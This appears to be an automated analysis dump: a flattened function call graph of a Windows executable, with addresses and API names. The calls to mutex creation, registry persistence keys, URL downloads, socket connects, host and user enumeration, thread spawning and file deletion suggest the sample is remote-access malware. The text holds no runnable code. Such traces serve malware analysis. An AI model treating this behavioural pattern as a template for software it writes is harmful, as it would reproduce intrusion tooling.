44b9d6 46177->46178 46179 44b9cb 46177->46179 46181 44b9de 46178->46181 46187 44b9e7 _strftime 46178->46187 46197 446aff 21 API calls 3 library calls 46179->46197 46191 446ac5 46181->46191 46182 44b9d3 46182->46176 46184 44ba11 RtlReAllocateHeap 46184->46182 46184->46187 46185 44b9ec 46198 445354 20 API calls _abort 46185->46198 46187->46184 46187->46185 46199 442200 7 API calls 2 library calls 46187->46199 46189->46176 46190->46174 46192 446ad0 RtlFreeHeap 46191->46192 46193 446af9 _free 46191->46193 46192->46193 46194 446ae5 46192->46194 46193->46182 46200 445354 20 API calls _abort 46194->46200 46196 446aeb GetLastError 46196->46193 46197->46182 46198->46182 46199->46187 46200->46196 46201 426091 46206 42610e send 46201->46206 46207 416122 46244 401d64 46207->46244 46209 41612d 46210 401d64 28 API calls 46209->46210 46211 416141 46210->46211 46249 41b687 46211->46249 46213 41614a 46214 401d64 28 API calls 46213->46214 46215 41615e 46214->46215 46253 41b61a CreateFileW 46215->46253 46218 401d64 28 API calls 46219 416186 46218->46219 46220 416199 46219->46220 46283 404cbf 46219->46283 46261 4027cb 46220->46261 46223 4161a5 46224 4027cb 28 API calls 46223->46224 46225 4161b1 46224->46225 46226 4027cb 28 API calls 46225->46226 46227 4161bb 46226->46227 46264 404468 46227->46264 46231 4161d4 46232 401eea 26 API calls 46231->46232 46233 4161dd 46232->46233 46234 401eea 26 API calls 46233->46234 46235 4161e9 46234->46235 46236 4161f2 46235->46236 46237 401eea 26 API calls 46235->46237 46287 401d8c 46236->46287 46237->46236 46239 4161fb 46240 401eea 26 API calls 46239->46240 46241 416207 46240->46241 46242 401eea 26 API calls 46241->46242 46243 416213 46242->46243 46245 401d6c 46244->46245 46246 401d74 46245->46246 46293 401fff 28 API calls 46245->46293 46246->46209 46250 41b693 46249->46250 46294 41b58f 46250->46294 46254 416170 46253->46254 46255 41b644 GetFileSize 46253->46255 46254->46218 46303 401e65 28 API calls 46255->46303 46257 41b658 46258 41b66a ReadFile 46257->46258 46259 41b677 46258->46259 46260 41b679 CloseHandle 46258->46260 46259->46260 46260->46254 46304 401e9b 46261->46304 46263 4027d9 46263->46223 46265 40447b 46264->46265 46313 404be8 46265->46313 46267 404490 ctype 46268 404507 WaitForSingleObject 46267->46268 46269 4044e7 46267->46269 46270 40451d 46268->46270 46271 4044f9 send 46269->46271 46317 42051a 56 API calls 46270->46317 46273 404542 46271->46273 46275 401eea 26 API calls 46273->46275 46274 404530 SetEvent 46274->46273 46276 40454a 46275->46276 46277 401eea 26 API calls 46276->46277 46278 404552 46277->46278 46279 401eea 46278->46279 46281 4021b9 46279->46281 46280 4021e8 46280->46231 46281->46280 46323 40262e 46281->46323 46284 404ccb 46283->46284 46331 402e78 46284->46331 46286 404cee 46286->46220 46288 40200a 46287->46288 46292 40203a 46288->46292 46340 402654 26 API calls 46288->46340 46290 40202b 46341 4026ba 26 API calls _Deallocate 46290->46341 46292->46239 46295 41b5a2 CreateFileW 46294->46295 46297 41b5db 46295->46297 46298 41b5df 46295->46298 46297->46213 46299 41b5f6 WriteFile 46298->46299 46300 41b5e6 SetFilePointer 46298->46300 46301 41b60b CloseHandle 46299->46301 46302 41b609 46299->46302 46300->46299 46300->46301 46301->46297 46302->46301 46303->46257 46305 401ea7 46304->46305 46308 40245c 46305->46308 46307 401eb9 46307->46263 46309 402469 46308->46309 46311 402478 46309->46311 46312 402ad3 28 API calls 46309->46312 46311->46307 46312->46311 46314 404bf0 46313->46314 46318 404c0c 46314->46318 46316 404c06 46316->46267 46317->46274 46319 404c16 46318->46319 46321 404c21 46319->46321 46322 404d07 28 API calls 46319->46322 46321->46316 46322->46321 46326 402bee 46323->46326 46325 40263b 46325->46280 46327 402bfb 46326->46327 46328 402c08 std::ios_base::_Ios_base_dtor 46326->46328 46330 4015d8 26 API calls _Deallocate 46327->46330 46328->46325 46330->46328 46332 402e85 46331->46332 46333 402e98 46332->46333 46335 402ea9 46332->46335 46336 402eae 46332->46336 46338 403445 28 API calls 46333->46338 46335->46286 46336->46335 46339 40225b 26 API calls 46336->46339 46338->46335 46339->46335 46340->46290 46341->46292 46342 425e56 46343 425e6b 46342->46343 46348 425f0b 46342->46348 46344 425f9e 46343->46344 46347 425f5a 46343->46347 46343->46348 46349 425eb9 46343->46349 46351 425eee 46343->46351 46355 425f77 46343->46355 46357 425f25 46343->46357 46370 424354 50 API calls ctype 46343->46370 46344->46348 46375 4255c7 28 API calls 46344->46375 46347->46355 46374 424b7b 21 API calls 46347->46374 46349->46348 46349->46351 46371 41f075 54 API calls 46349->46371 46351->46348 46351->46357 46372 424354 50 API calls ctype 46351->46372 46355->46344 46355->46348 46358 424f78 46355->46358 46357->46347 46357->46348 46373 41f075 54 API calls 46357->46373 46359 424f97 ___scrt_fastfail 46358->46359 46361 424fa6 46359->46361 46364 424fcb 46359->46364 46376 41e097 21 API calls 46359->46376 46361->46364 46369 424fab 46361->46369 46377 41fad4 47 API calls 46361->46377 46364->46344 46365 424fb4 46365->46364 46380 424185 21 API calls 2 library calls 46365->46380 46367 42504e 46367->46364 46378 431f99 21 API calls ___crtLCMapStringA 46367->46378 46369->46364 46369->46365 46379 41cf6e 50 API calls 46369->46379 46370->46349 46371->46349 46372->46357 46373->46357 46374->46355 46375->46348 46376->46361 46377->46367 46378->46369 46379->46365 46380->46364 46381 43a998 46384 43a9a4 _swprintf ___scrt_is_nonwritable_in_current_image 46381->46384 46382 43a9b2 46399 445354 20 API calls _abort 46382->46399 46384->46382 46387 43a9dc 46384->46387 46385 43a9b7 46400 43a827 26 API calls _Deallocate 46385->46400 46394 444acc EnterCriticalSection 46387->46394 46389 43a9e7 46395 43aa88 46389->46395 46392 43a9c2 std::_Locinfo::_Locinfo_dtor 46394->46389 46397 43aa96 46395->46397 46396 43a9f2 46401 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46396->46401 46397->46396 46402 448416 39 API calls 2 library calls 46397->46402 46399->46385 46400->46392 46401->46392 46402->46397 46403 414dba 46418 41a51b 46403->46418 46405 414dc3 46428 401fbd 46405->46428 46408 404468 60 API calls 46409 414dde 46408->46409 46410 4161f2 46409->46410 46411 401eea 26 API calls 46409->46411 46412 401d8c 26 API calls 46410->46412 46411->46410 46413 4161fb 46412->46413 46414 401eea 26 API calls 46413->46414 46415 416207 46414->46415 46416 401eea 26 API calls 46415->46416 46417 416213 46416->46417 46419 41a529 46418->46419 46432 43a88c 46419->46432 46422 41a55c InternetReadFile 46426 41a57f 46422->46426 46424 41a5ac InternetCloseHandle InternetCloseHandle 46425 41a5be 46424->46425 46425->46405 46426->46422 46426->46424 46427 401eea 26 API calls 46426->46427 46439 401f86 46426->46439 46427->46426 46429 401fcc 46428->46429 46450 402501 46429->46450 46431 401fea 46431->46408 46437 446aff _strftime 46432->46437 46433 446b3d 46444 445354 20 API calls _abort 46433->46444 46434 446b28 RtlAllocateHeap 46436 41a533 InternetOpenW InternetOpenUrlW 46434->46436 46434->46437 46436->46422 46437->46433 46437->46434 46443 442200 7 API calls 2 library calls 46437->46443 46440 401f8e 46439->46440 46445 402325 46440->46445 46442 401fa4 46442->46426 46443->46437 46444->46436 46446 40232f 46445->46446 46448 40233a 46446->46448 46449 40294a 28 API calls 46446->46449 46448->46442 46449->46448 46451 40250d 46450->46451 46453 40252b 46451->46453 46454 40261a 28 API calls 46451->46454 46453->46431 46454->46453 46455 402bcc 46456 402bd7 46455->46456 46457 402bdf 46455->46457 46473 403315 28 API calls _Deallocate 46456->46473 46459 402beb 46457->46459 46463 4015d3 46457->46463 46460 402bdd 46465 43360d 46463->46465 46464 43a88c ___crtLCMapStringA 21 API calls 46464->46465 46465->46464 46466 402be9 46465->46466 46469 43362e std::_Facet_Register 46465->46469 46474 442200 7 API calls 2 library calls 46465->46474 46468 433dec std::_Facet_Register 46476 437bd7 RaiseException 46468->46476 46469->46468 46475 437bd7 RaiseException 46469->46475 46471 433e09 46473->46460 46474->46465 46475->46468 46476->46471 46477 4339be 46478 4339ca ___scrt_is_nonwritable_in_current_image 46477->46478 46509 4336b3 46478->46509 46480 4339d1 46481 433b24 46480->46481 46484 4339fb 46480->46484 46809 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46481->46809 46483 433b2b 46810 4426be 28 API calls _abort 46483->46810 46495 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46484->46495 46803 4434d1 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46484->46803 46486 433b31 46811 442670 28 API calls _abort 46486->46811 46489 433a14 46491 433a1a 46489->46491 46804 443475 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46489->46804 46490 433b39 46493 433a9b 46520 433c5e 46493->46520 46495->46493 46805 43edf4 38 API calls 3 library calls 46495->46805 46503 433abd 46503->46483 46504 433ac1 46503->46504 46505 433aca 46504->46505 46807 442661 28 API calls _abort 46504->46807 46808 433842 13 API calls 2 library calls 46505->46808 46508 433ad2 46508->46491 46510 4336bc 46509->46510 46812 433e0a IsProcessorFeaturePresent 46510->46812 46512 4336c8 46813 4379ee 10 API calls 3 library calls 46512->46813 46514 4336cd 46519 4336d1 46514->46519 46814 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46514->46814 46516 4336da 46517 4336e8 46516->46517 46815 437a17 8 API calls 3 library calls 46516->46815 46517->46480 46519->46480 46816 436050 46520->46816 46523 433aa1 46524 443422 46523->46524 46818 44ddc9 46524->46818 46526 44342b 46527 433aaa 46526->46527 46822 44e0d3 38 API calls 46526->46822 46529 40d767 46527->46529 46824 41bce3 LoadLibraryA GetProcAddress 46529->46824 46531 40d783 GetModuleFileNameW 46829 40e168 46531->46829 46533 40d79f 46534 401fbd 28 API calls 46533->46534 46535 40d7ae 46534->46535 46536 401fbd 28 API calls 46535->46536 46537 40d7bd 46536->46537 46844 41afc3 46537->46844 46541 40d7cf 46542 401d8c 26 API calls 46541->46542 46543 40d7d8 46542->46543 46544 40d835 46543->46544 46545 40d7eb 46543->46545 46546 401d64 28 API calls 46544->46546 47108 40e986 111 API calls 46545->47108 46548 40d845 46546->46548 46551 401d64 28 API calls 46548->46551 46549 40d7fd 46550 401d64 28 API calls 46549->46550 46554 40d809 46550->46554 46552 40d864 46551->46552 46553 404cbf 28 API calls 46552->46553 46555 40d873 46553->46555 47109 40e937 68 API calls 46554->47109 46869 405ce6 46555->46869 46558 40d87f 46872 401eef 46558->46872 46559 40d824 47110 40e155 68 API calls 46559->47110 46562 40d88b 46563 401eea 26 API calls 46562->46563 46564 40d894 46563->46564 46566 401eea 26 API calls 46564->46566 46565 401eea 26 API calls 46567 40dc9f 46565->46567 46568 40d89d 46566->46568 46806 433c94 GetModuleHandleW 46567->46806 46569 401d64 28 API calls 46568->46569 46570 40d8a6 46569->46570 46876 401ebd 46570->46876 46572 40d8b1 46573 401d64 28 API calls 46572->46573 46574 40d8ca 46573->46574 46575 401d64 28 API calls 46574->46575 46577 40d8e5 46575->46577 46576 40d946 46579 401d64 28 API calls 46576->46579 46594 40e134 46576->46594 46577->46576 47111 4085b4 46577->47111 46584 40d95d 46579->46584 46580 40d912 46581 401eef 26 API calls 46580->46581 46582 40d91e 46581->46582 46585 401eea 26 API calls 46582->46585 46583 40d9a4 46880 40bed7 46583->46880 46584->46583 46589 4124b7 3 API calls 46584->46589 46586 40d927 46585->46586 47115 4124b7 RegOpenKeyExA 46586->47115 46588 40d9aa 46590 40d82d 46588->46590 46883 41a463 46588->46883 46595 40d988 46589->46595 46590->46565 46593 40d9c5 46596 40da18 46593->46596 46900 40697b 46593->46900 47193 412902 30 API calls 46594->47193 46595->46583 47118 412902 30 API calls 46595->47118 46598 401d64 28 API calls 46596->46598 46601 40da21 46598->46601 46610 40da32 46601->46610 46611 40da2d 46601->46611 46603 40e14a 47194 4112b5 64 API calls ___scrt_fastfail 46603->47194 46604 40d9e4 47119 40699d 30 API calls 46604->47119 46605 40d9ee 46607 401d64 28 API calls 46605->46607 46618 40d9f7 46607->46618 46613 401d64 28 API calls 46610->46613 47122 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46611->47122 46612 40d9e9 47120 4064d0 97 API calls 46612->47120 46616 40da3b 46613->46616 46904 41ae08 46616->46904 46618->46596 46621 40da13 46618->46621 46619 40da46 46908 401e18 46619->46908 47121 4064d0 97 API calls 46621->47121 46622 40da51 46912 401e13 46622->46912 46625 40da5a 46626 401d64 28 API calls 46625->46626 46627 40da63 46626->46627 46628 401d64 28 API calls 46627->46628 46629 40da7d 46628->46629 46630 401d64 28 API calls 46629->46630 46631 40da97 46630->46631 46632 401d64 28 API calls 46631->46632 46634 40dab0 46632->46634 46633 40db1d 46635 40db2c 46633->46635 46642 40dcaa ___scrt_fastfail 46633->46642 46634->46633 46636 401d64 28 API calls 46634->46636 46637 40db35 46635->46637 46665 40dbb1 ___scrt_fastfail 46635->46665 46640 40dac5 _wcslen 46636->46640 46638 401d64 28 API calls 46637->46638 46639 40db3e 46638->46639 46641 401d64 28 API calls 46639->46641 46640->46633 46643 401d64 28 API calls 46640->46643 46644 40db50 46641->46644 47182 41265d RegOpenKeyExA 46642->47182 46645 40dae0 46643->46645 46647 401d64 28 API calls 46644->46647 46648 401d64 28 API calls 46645->46648 46649 40db62 46647->46649 46650 40daf5 46648->46650 46653 401d64 28 API calls 46649->46653 47123 40c89e 46650->47123 46651 40dcef 46652 401d64 28 API calls 46651->46652 46654 40dd16 46652->46654 46656 40db8b 46653->46656 46926 401f66 46654->46926 46659 401d64 28 API calls 46656->46659 46658 401e18 26 API calls 46661 40db14 46658->46661 46662 40db9c 46659->46662 46664 401e13 26 API calls 46661->46664 47180 40bc67 45 API calls _wcslen 46662->47180 46663 40dd25 46930 4126d2 RegCreateKeyA 46663->46930 46664->46633 46916 4128a2 46665->46916 46669 40dc45 ctype 46674 401d64 28 API calls 46669->46674 46670 40dbac 46670->46665 46672 401d64 28 API calls 46673 40dd47 46672->46673 46936 43a5e7 46673->46936 46675 40dc5c 46674->46675 46675->46651 46679 40dc70 46675->46679 46678 40dd5e 47185 41beb0 86 API calls ___scrt_fastfail 46678->47185 46681 401d64 28 API calls 46679->46681 46680 40dd81 46685 401f66 28 API calls 46680->46685 46683 40dc7e 46681->46683 46686 41ae08 28 API calls 46683->46686 46684 40dd65 CreateThread 46684->46680 47849 41c96f 10 API calls 46684->47849 46687 40dd96 46685->46687 46688 40dc87 46686->46688 46689 401f66 28 API calls 46687->46689 47181 40e219 109 API calls 46688->47181 46691 40dda5 46689->46691 46940 41a686 46691->46940 46692 40dc8c 46692->46651 46694 40dc93 46692->46694 46694->46590 46696 401d64 28 API calls 46697 40ddb6 46696->46697 46698 401d64 28 API calls 46697->46698 46699 40ddcb 46698->46699 46700 401d64 28 API calls 46699->46700 46701 40ddeb 46700->46701 46702 43a5e7 _strftime 42 API calls 46701->46702 46703 40ddf8 46702->46703 46704 401d64 28 API calls 46703->46704 46705 40de03 46704->46705 46706 401d64 28 API calls 46705->46706 46707 40de14 46706->46707 46708 401d64 28 API calls 46707->46708 46709 40de29 46708->46709 46710 401d64 28 API calls 46709->46710 46711 40de3a 46710->46711 46712 40de41 StrToIntA 46711->46712 46964 409517 46712->46964 46715 401d64 28 API calls 46716 40de5c 46715->46716 46717 40dea1 46716->46717 46718 40de68 46716->46718 46721 401d64 28 API calls 46717->46721 47186 43360d 22 API calls 3 library calls 46718->47186 46720 40de71 46722 401d64 28 API calls 46720->46722 46723 40deb1 46721->46723 46724 40de84 46722->46724 46725 40def9 46723->46725 46726 40debd 46723->46726 46727 40de8b CreateThread 46724->46727 46729 401d64 28 API calls 46725->46729 47187 43360d 22 API calls 3 library calls 46726->47187 46727->46717 47847 419128 102 API calls 2 library calls 46727->47847 46731 40df02 46729->46731 46730 40dec6 46732 401d64 28 API calls 46730->46732 46734 40df6c 46731->46734 46735 40df0e 46731->46735 46733 40ded8 46732->46733 46736 40dedf CreateThread 46733->46736 46737 401d64 28 API calls 46734->46737 46738 401d64 28 API calls 46735->46738 46736->46725 47846 419128 102 API calls 2 library calls 46736->47846 46739 40df75 46737->46739 46740 40df1e 46738->46740 46741 40df81 46739->46741 46742 40dfba 46739->46742 46743 401d64 28 API calls 46740->46743 46744 401d64 28 API calls 46741->46744 46989 41a7a2 GetComputerNameExW GetUserNameW 46742->46989 46745 40df33 46743->46745 46747 40df8a 46744->46747 47188 40c854 31 API calls 46745->47188 46753 401d64 28 API calls 46747->46753 46749 401e18 26 API calls 46750 40dfce 46749->46750 46752 401e13 26 API calls 46750->46752 46755 40dfd7 46752->46755 46756 40df9f 46753->46756 46754 40df46 46757 401e18 26 API calls 46754->46757 46758 40dfe0 SetProcessDEPPolicy 46755->46758 46759 40dfe3 CreateThread 46755->46759 46766 43a5e7 _strftime 42 API calls 46756->46766 46760 40df52 46757->46760 46758->46759 46761 40e004 46759->46761 46762 40dff8 CreateThread 46759->46762 47819 40e54f 46759->47819 46763 401e13 26 API calls 46760->46763 46764 40e019 46761->46764 46765 40e00d CreateThread 46761->46765 46762->46761 47848 410f36 137 API calls 46762->47848 46767 40df5b CreateThread 46763->46767 46769 40e073 46764->46769 46771 401f66 28 API calls 46764->46771 46765->46764 47850 411524 38 API calls ___scrt_fastfail 46765->47850 46768 40dfac 46766->46768 46767->46734 47851 40196b 49 API calls _strftime 46767->47851 47189 40b95c 7 API calls 46768->47189 47000 41246e RegOpenKeyExA 46769->47000 46772 40e046 46771->46772 47190 404c9e 28 API calls 46772->47190 46775 40e053 46777 401f66 28 API calls 46775->46777 46779 40e062 46777->46779 46778 40e12a 47012 40cbac 46778->47012 46782 41a686 79 API calls 46779->46782 46781 41ae08 28 API calls 46784 40e0a4 46781->46784 46785 40e067 46782->46785 47003 412584 RegOpenKeyExW 46784->47003 46787 401eea 26 API calls 46785->46787 46787->46769 46790 401e13 26 API calls 46793 40e0c5 46790->46793 46791 40e0ed DeleteFileW 46792 40e0f4 46791->46792 46791->46793 46795 41ae08 28 API calls 46792->46795 46793->46791 46793->46792 46794 40e0db Sleep 46793->46794 47191 401e07 46794->47191 46797 40e104 46795->46797 47008 41297a RegOpenKeyExW 46797->47008 46799 40e117 46800 401e13 26 API calls 46799->46800 46801 40e121 46800->46801 46802 401e13 26 API calls 46801->46802 46802->46778 46803->46489 46804->46495 46805->46493 46806->46503 46807->46505 46808->46508 46809->46483 46810->46486 46811->46490 46812->46512 46813->46514 46814->46516 46815->46519 46817 433c71 GetStartupInfoW 46816->46817 46817->46523 46819 44dddb 46818->46819 46820 44ddd2 46818->46820 46819->46526 46823 44dcc8 51 API calls 4 library calls 46820->46823 46822->46526 46823->46819 46825 41bd22 LoadLibraryA GetProcAddress 46824->46825 46826 41bd12 GetModuleHandleA GetProcAddress 46824->46826 46827 41bd4b 32 API calls 46825->46827 46828 41bd3b LoadLibraryA GetProcAddress 46825->46828 46826->46825 46827->46531 46828->46827 47195 41a63f FindResourceA 46829->47195 46832 43a88c ___crtLCMapStringA 21 API calls 46833 40e192 ctype 46832->46833 46834 401f86 28 API calls 46833->46834 46835 40e1ad 46834->46835 46836 401eef 26 API calls 46835->46836 46837 40e1b8 46836->46837 46838 401eea 26 API calls 46837->46838 46839 40e1c1 46838->46839 46840 43a88c ___crtLCMapStringA 21 API calls 46839->46840 46841 40e1d2 ctype 46840->46841 47198 406052 46841->47198 46843 40e205 46843->46533 46864 41afd6 46844->46864 46845 41b046 46846 401eea 26 API calls 46845->46846 46847 41b078 46846->46847 46848 401eea 26 API calls 46847->46848 46851 41b080 46848->46851 46849 41b048 46852 403b60 28 API calls 46849->46852 46853 401eea 26 API calls 46851->46853 46854 41b054 46852->46854 46857 40d7c6 46853->46857 46855 401eef 26 API calls 46854->46855 46858 41b05d 46855->46858 46856 401eef 26 API calls 46856->46864 46865 40e8bd 46857->46865 46859 401eea 26 API calls 46858->46859 46861 41b065 46859->46861 46860 401eea 26 API calls 46860->46864 47205 41bfa9 28 API calls 46861->47205 46864->46845 46864->46849 46864->46856 46864->46860 47201 403b60 46864->47201 47204 41bfa9 28 API calls 46864->47204 46866 40e8ca 46865->46866 46868 40e8da 46866->46868 47222 40200a 26 API calls 46866->47222 46868->46541 47223 404bc4 46869->47223 46871 405cf4 46871->46558 46873 401efe 46872->46873 46875 401f0a 46873->46875 47227 4021b9 26 API calls 46873->47227 46875->46562 46877 401ec9 46876->46877 46878 401ee4 46877->46878 46879 402325 28 API calls 46877->46879 46878->46572 46879->46878 47228 401e8f 46880->47228 46882 40bee1 CreateMutexA GetLastError 46882->46588 47230 41b15b 46883->47230 46888 401eef 26 API calls 46889 41a49f 46888->46889 46890 401eea 26 API calls 46889->46890 46891 41a4a7 46890->46891 46892 41a4fa 46891->46892 46893 412513 31 API calls 46891->46893 46892->46593 46894 41a4cd 46893->46894 46895 41a4d8 StrToIntA 46894->46895 46896 41a4ef 46895->46896 46897 41a4e6 46895->46897 46899 401eea 26 API calls 46896->46899 47238 41c102 28 API calls 46897->47238 46899->46892 46901 40698f 46900->46901 46902 4124b7 3 API calls 46901->46902 46903 406996 46902->46903 46903->46604 46903->46605 46905 41ae1c 46904->46905 47239 40b027 46905->47239 46907 41ae24 46907->46619 46909 401e27 46908->46909 46910 401e33 46909->46910 47248 402121 26 API calls 46909->47248 46910->46622 46914 402121 46912->46914 46913 402150 46913->46625 46914->46913 47249 402718 26 API calls _Deallocate 46914->47249 46917 4128c0 46916->46917 46918 406052 28 API calls 46917->46918 46919 4128d5 46918->46919 46920 401fbd 28 API calls 46919->46920 46921 4128e5 46920->46921 46922 4126d2 29 API calls 46921->46922 46923 4128ef 46922->46923 46924 401eea 26 API calls 46923->46924 46925 4128fc 46924->46925 46925->46669 46927 401f6e 46926->46927 47250 402301 46927->47250 46931 412722 46930->46931 46933 4126eb 46930->46933 46932 401eea 26 API calls 46931->46932 46934 40dd3b 46932->46934 46935 4126fd RegSetValueExA RegCloseKey 46933->46935 46934->46672 46935->46931 46937 43a600 _strftime 46936->46937 47254 43993e 46937->47254 46941 41a737 46940->46941 46942 41a69c GetLocalTime 46940->46942 46944 401eea 26 API calls 46941->46944 46943 404cbf 28 API calls 46942->46943 46945 41a6de 46943->46945 46946 41a73f 46944->46946 46947 405ce6 28 API calls 46945->46947 46948 401eea 26 API calls 46946->46948 46949 41a6ea 46947->46949 46950 40ddaa 46948->46950 46951 4027cb 28 API calls 46949->46951 46950->46696 46952 41a6f6 46951->46952 46953 405ce6 28 API calls 46952->46953 46954 41a702 46953->46954 47288 406478 76 API calls 46954->47288 46956 41a710 46957 401eea 26 API calls 46956->46957 46958 41a71c 46957->46958 46959 401eea 26 API calls 46958->46959 46960 41a725 46959->46960 46961 401eea 26 API calls 46960->46961 46962 41a72e 46961->46962 46963 401eea 26 API calls 46962->46963 46963->46941 46965 409536 _wcslen 46964->46965 46966 409541 46965->46966 46967 409558 46965->46967 46968 40c89e 31 API calls 46966->46968 46969 40c89e 31 API calls 46967->46969 46970 409549 46968->46970 46971 409560 46969->46971 46972 401e18 26 API calls 46970->46972 46973 401e18 26 API calls 46971->46973 46988 409553 46972->46988 46974 40956e 46973->46974 46975 401e13 26 API calls 46974->46975 46977 409576 46975->46977 46976 401e13 26 API calls 46978 4095ad 46976->46978 47304 40856b 28 API calls 46977->47304 47289 409837 46978->47289 46981 409588 47305 4028cf 46981->47305 46984 409593 46985 401e18 26 API calls 46984->46985 46986 40959d 46985->46986 46987 401e13 26 API calls 46986->46987 46987->46988 46988->46976 47473 403b40 46989->47473 46993 41a7fd 46994 4028cf 28 API calls 46993->46994 46995 41a807 46994->46995 46996 401e13 26 API calls 46995->46996 46997 41a810 46996->46997 46998 401e13 26 API calls 46997->46998 46999 40dfc3 46998->46999 46999->46749 47001 41248f RegQueryValueExA RegCloseKey 47000->47001 47002 40e08b 47000->47002 47001->47002 47002->46778 47002->46781 47004 4125b0 RegQueryValueExW RegCloseKey 47003->47004 47005 4125dd 47003->47005 47004->47005 47006 403b40 28 API calls 47005->47006 47007 40e0ba 47006->47007 47007->46790 47009 412992 RegDeleteValueW 47008->47009 47010 4129a6 47008->47010 47009->47010 47011 4129a2 47009->47011 47010->46799 47011->46799 47013 40cbc5 47012->47013 47014 41246e 3 API calls 47013->47014 47015 40cbcc 47014->47015 47019 40cbeb 47015->47019 47495 401602 47015->47495 47017 40cbd9 47498 4127d5 RegCreateKeyA 47017->47498 47020 413fd4 47019->47020 47021 413feb 47020->47021 47515 41aa73 47021->47515 47023 413ff6 47024 401d64 28 API calls 47023->47024 47025 41400f 47024->47025 47026 43a5e7 _strftime 42 API calls 47025->47026 47027 41401c 47026->47027 47028 414021 Sleep 47027->47028 47029 41402e 47027->47029 47028->47029 47030 401f66 28 API calls 47029->47030 47031 41403d 47030->47031 47032 401d64 28 API calls 47031->47032 47033 41404b 47032->47033 47034 401fbd 28 API calls 47033->47034 47035 414053 47034->47035 47036 41afc3 28 API calls 47035->47036 47037 41405b 47036->47037 47519 404262 WSAStartup 47037->47519 47039 414065 47040 401d64 28 API calls 47039->47040 47041 41406e 47040->47041 47042 401d64 28 API calls 47041->47042 47103 4140ed 47041->47103 47043 414087 47042->47043 47044 401d64 28 API calls 47043->47044 47045 414098 47044->47045 47047 401d64 28 API calls 47045->47047 47046 41afc3 28 API calls 47046->47103 47048 4140a9 47047->47048 47050 401d64 28 API calls 47048->47050 47049 4085b4 28 API calls 47049->47103 47051 4140ba 47050->47051 47053 401d64 28 API calls 47051->47053 47052 401eef 26 API calls 47052->47103 47054 4140cb 47053->47054 47055 401d64 28 API calls 47054->47055 47056 4140dd 47055->47056 47649 404101 87 API calls 47056->47649 47058 404cbf 28 API calls 47058->47103 47059 401d64 28 API calls 47059->47103 47061 414244 WSAGetLastError 47650 41bc76 30 API calls 47061->47650 47066 401f66 28 API calls 47067 414259 47066->47067 47067->47066 47069 41a686 79 API calls 47067->47069 47071 401d64 28 API calls 47067->47071 47072 401d8c 26 API calls 47067->47072 47073 43a5e7 _strftime 42 API calls 47067->47073 47067->47103 47105 414b22 CreateThread 47067->47105 47106 401eea 26 API calls 47067->47106 47107 401e13 26 API calls 47067->47107 47651 404c9e 28 API calls 47067->47651 47652 40a767 84 API calls 47067->47652 47653 4047eb 98 API calls 47067->47653 47069->47067 47071->47067 47072->47067 47074 414b80 Sleep 47073->47074 47074->47067 47075 401f66 28 API calls 47075->47103 47076 41a686 79 API calls 47076->47103 47079 4082dc 28 API calls 47079->47103 47080 440c51 26 API calls 47080->47103 47081 401fbd 28 API calls 47081->47103 47082 41265d 3 API calls 47082->47103 47083 412513 31 API calls 47083->47103 47084 403b40 28 API calls 47084->47103 47087 41aec8 28 API calls 47087->47103 47088 41ad46 28 API calls 47088->47103 47089 401d64 28 API calls 47090 4144ed GetTickCount 47089->47090 47091 41ad46 28 API calls 47090->47091 47091->47103 47096 40275c 28 API calls 47096->47103 47097 405ce6 28 API calls 47097->47103 47098 4027cb 28 API calls 47098->47103 47099 404468 60 API calls 47099->47103 47100 401eea 26 API calls 47100->47103 47101 401e13 26 API calls 47101->47103 47103->47046 47103->47049 47103->47052 47103->47058 47103->47059 47103->47061 47103->47067 47103->47075 47103->47076 47103->47079 47103->47080 47103->47081 47103->47082 47103->47083 47103->47084 47103->47087 47103->47088 47103->47089 47103->47096 47103->47097 47103->47098 47103->47099 47103->47100 47103->47101 47520 413f9a 47103->47520 47525 4041f1 47103->47525 47532 404915 47103->47532 47547 40428c connect 47103->47547 47607 41a96d 47103->47607 47610 413683 47103->47610 47613 40cbf1 47103->47613 47619 41adee 47103->47619 47622 41aca0 47103->47622 47624 41ac52 47103->47624 47629 40e679 GetLocaleInfoA 47103->47629 47632 4027ec 28 API calls 47103->47632 47633 4045d5 47103->47633 47105->47067 47812 419e89 102 API calls 47105->47812 47106->47067 47107->47067 47108->46549 47109->46559 47112 4085c0 47111->47112 47113 402e78 28 API calls 47112->47113 47114 4085e4 47113->47114 47114->46580 47116 4124e1 RegQueryValueExA RegCloseKey 47115->47116 47117 41250b 47115->47117 47116->47117 47117->46576 47118->46583 47119->46612 47120->46605 47121->46596 47122->46610 47124 40c8ba 47123->47124 47125 40c8da 47124->47125 47126 40c90f 47124->47126 47128 40c8d0 47124->47128 47813 41a74b 29 API calls 47125->47813 47129 41b15b GetCurrentProcess 47126->47129 47127 40ca03 GetLongPathNameW 47131 403b40 28 API calls 47127->47131 47128->47127 47132 40c914 47129->47132 47134 40ca18 47131->47134 47135 40c918 47132->47135 47136 40c96a 47132->47136 47133 40c8e3 47137 401e18 26 API calls 47133->47137 47138 403b40 28 API calls 47134->47138 47140 403b40 28 API calls 47135->47140 47139 403b40 28 API calls 47136->47139 47141 40c8ed 47137->47141 47142 40ca27 47138->47142 47143 40c978 47139->47143 47144 40c926 47140->47144 47145 401e13 26 API calls 47141->47145 47816 40cc37 28 API calls 47142->47816 47149 403b40 28 API calls 47143->47149 47150 403b40 28 API calls 47144->47150 47145->47128 47147 40ca3a 47817 402860 28 API calls 47147->47817 47152 40c98e 47149->47152 47153 40c93c 47150->47153 47151 40ca45 47818 402860 28 API calls 47151->47818 47815 402860 28 API calls 47152->47815 47814 402860 28 API calls 47153->47814 47157 40ca4f 47161 401e13 26 API calls 47157->47161 47158 40c999 47162 401e18 26 API calls 47158->47162 47159 40c947 47160 401e18 26 API calls 47159->47160 47164 40c952 47160->47164 47165 40ca59 47161->47165 47163 40c9a4 47162->47163 47166 401e13 26 API calls 47163->47166 47167 401e13 26 API calls 47164->47167 47168 401e13 26 API calls 47165->47168 47170 40c9ad 47166->47170 47171 40c95b 47167->47171 47169 40ca62 